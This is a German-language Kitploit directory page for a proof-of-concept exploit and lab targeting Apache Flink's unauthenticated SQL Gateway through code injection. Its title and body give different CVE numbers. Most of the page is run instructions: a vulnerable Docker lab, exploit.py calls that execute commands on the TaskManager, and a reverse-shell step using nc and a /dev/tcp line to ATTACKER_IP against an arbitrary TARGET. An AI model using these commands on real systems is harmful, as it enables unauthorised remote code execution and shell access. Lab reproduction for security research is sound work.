Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25194 — Proof-of-concept exploit and lab environment for CVE-2026-25194 | Kitploit
Tools/GitHubGitHub/dexsemon/cve-2026-25194
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

Proof-of-concept exploit and lab environment for CVE-2026-25194

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-35194 — Apache Flink SQL Code Injection

Remote-Code-Ausführung auf Apache Flink TaskManagern durch SQL-Code-Generierungs-Injection.

CVECVE-2026-35194
CVSS8.1 (Hoch)
CWECWE-94 — Code Injection
BetroffenFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Behoben1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
AngriffsflächeSQL Gateway REST API (Standard-Port 8083, keine Authentifizierung)

Schnellstart

1. Verwundbare Laborumgebung bereitstellen

root@kitploit:~
docker compose up -d

Warten Sie etwa 30 Sekunden, bis der Cluster gestartet ist. Es werden zwei Dienste gestartet:

  • Flink Web UI – http://localhost:8081
  • SQL Gateway REST API – http://localhost:8083

Überprüfen:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Sollte Version "1.20.3" zurückgeben

2. Abhängigkeiten installieren

root@kitploit:~
pip install requests

3. Exploit

JSON vector:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE vector:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Nur Versionsprüfung (kein RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

RCE auf TaskManager überprüfen:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Reverse Shell

root@kitploit:~
# Terminal 1 – Listener
nc -lvnp 4444

# Terminal 2 – Exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Verwendung

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Haftungsausschluss

Nur für autorisierte Sicherheitsforschung und zu Bildungszwecken.

Tool herunterladen